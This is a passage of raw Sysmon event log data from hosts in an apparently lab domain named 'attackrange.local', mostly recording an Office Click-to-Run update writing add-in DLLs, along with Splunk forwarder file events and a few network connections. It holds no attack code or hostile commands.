Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_XPS.DLL2021-04-20 14:54:09.112 11241100x800000000000000064074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO99LRES.DLL2021-04-20 14:54:09.112 11241100x800000000000000064073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:09.112 11241100x800000000000000064072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO40UIRES.DLL2021-04-20 14:54:09.112 11241100x800000000000000064071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO.DLL2021-04-20 14:54:09.112 23542300x800000000000000064070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:09.112{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CC7D62F228809550AFF2E0421D90F7,SHA256=32D4A86026AA5993E3FC4AA8AFEA63A5044B411E61B992398C429B0D71DC4AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049467Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:09.463{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98333A0389289BD6A836B124BCB8879C,SHA256=45C7C15924ECCC63A98A6BAFD0305353DEDCF1B1A6282D18D5D586DE3BBA21B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049466Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:09.369{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809F45D6119C63C442390EBD0C991ADE,SHA256=B60EBEF3467315E1A93D5557137A5BB7B9DFFD51F9ED8F8D84D4697413897D1B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049465Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:06.650{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52481-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049464Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:06.219{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53143-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.893{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.DataStreamer.Excel.dll2021-04-20 14:54:10.893 11241100x800000000000000064307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.893{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.SapClient.dll2021-04-20 14:54:10.878 11241100x800000000000000064306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.Query.NetFX35.dll2021-04-20 14:54:10.878 11241100x800000000000000064305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.ValueTuple.dll2021-04-20 14:54:10.878 11241100x800000000000000064304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.NetFX35.dll2021-04-20 14:54:10.878 11241100x800000000000000064303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.Runtime.InteropServices.RuntimeInformation.dll2021-04-20 14:54:10.878 11241100x800000000000000064302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Common.dll2021-04-20 14:54:10.878 11241100x800000000000000064301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MsoAriaCApiWrapper.dll2021-04-20 14:54:10.878 11241100x800000000000000064300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Excel.dll2021-04-20 14:54:10.878 11241100x800000000000000064299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Common.v4.0.Utilities.dll2021-04-20 14:54:10.878 11241100x800000000000000064298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll2021-04-20 14:54:10.878 11241100x800000000000000064297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.VisualStudio.Tools.Applications.Runtime.dll2021-04-20 14:54:10.878 11241100x800000000000000064296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.dll2021-04-20 14:54:10.878 11241100x800000000000000064295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe2021-04-20 14:54:10.878 11241100x800000000000000064294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.Themes.dll2021-04-20 14:54:10.878 11241100x800000000000000064293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.DocumentServices.dll2021-04-20 14:54:10.878 11241100x800000000000000064292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.Edm.NetFX35.dll2021-04-20 14:54:10.878 11241100x800000000000000064291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Packaging.dll2021-04-20 14:54:10.878 11241100x800000000000000064290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe2021-04-20 14:54:10.878 11241100x800000000000000064289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Models.dll2021-04-20 14:54:10.878 11241100x800000000000000064288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.UI.dll2021-04-20 14:54:10.878 11241100x800000000000000064287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.SapBwProvider.dll2021-04-20 14:54:10.878 11241100x800000000000000064286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.MashupEngine.dll2021-04-20 14:54:10.690 11241100x800000000000000064285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.V7.dll2021-04-20 14:54:10.690 11241100x800000000000000064284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.dll2021-04-20 14:54:10.690 11241100x800000000000000064283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Edm.NetFX35.V7.dll2021-04-20 14:54:10.690 11241100x800000000000000064282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Edm.NetFX35.dll2021-04-20 14:54:10.690 11241100x800000000000000064281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.PowerBI.AdomdClient.dll2021-04-20 14:54:10.690 11241100x800000000000000064280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Practices.Unity.dll2021-04-20 14:54:10.690 11241100x800000000000000064279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.ProgramSynthesis.dll2021-04-20 14:54:10.690 11241100x800000000000000064278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.V7.dll2021-04-20 14:54:10.690 11241100x800000000000000064277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll2021-04-20 14:54:10.690 11241100x800000000000000064276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Newtonsoft.Json.dll2021-04-20 14:54:10.690 11241100x800000000000000064275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Collections.Immutable.dll2021-04-20 14:54:10.440 11241100x800000000000000064274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll2021-04-20 14:54:10.425 11241100x800000000000000064273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Web.Mvc.dll2021-04-20 14:54:10.425 11241100x800000000000000064272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\mashupcompression.dll2021-04-20 14:54:10.425 11241100x800000000000000064271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINCORE.DLL2021-04-20 14:54:10.425 11241100x800000000000000064270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINDATAPROVIDER.DLL2021-04-20 14:54:10.425 11241100x800000000000000064269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\POWERMAPCLASSIFICATION.DLL2021-04-20 14:54:10.409 11241100x800000000000000064268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHART.DLL2021-04-20 14:54:10.409 11241100x800000000000000064267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHARTCOMMON.DLL2021-04-20 14:54:10.409 11241100x800000000000000064266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCOMMON.DLL2021-04-20 14:54:10.409 11241100x800000000000000064265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.393{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCONTROL.DLL2021-04-20 14:54:10.393 11241100x800000000000000064264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLL2021-04-20 14:54:10.378 11241100x800000000000000064263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONENGINE.DLL2021-04-20 14:54:10.378 11241100x800000000000000064262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 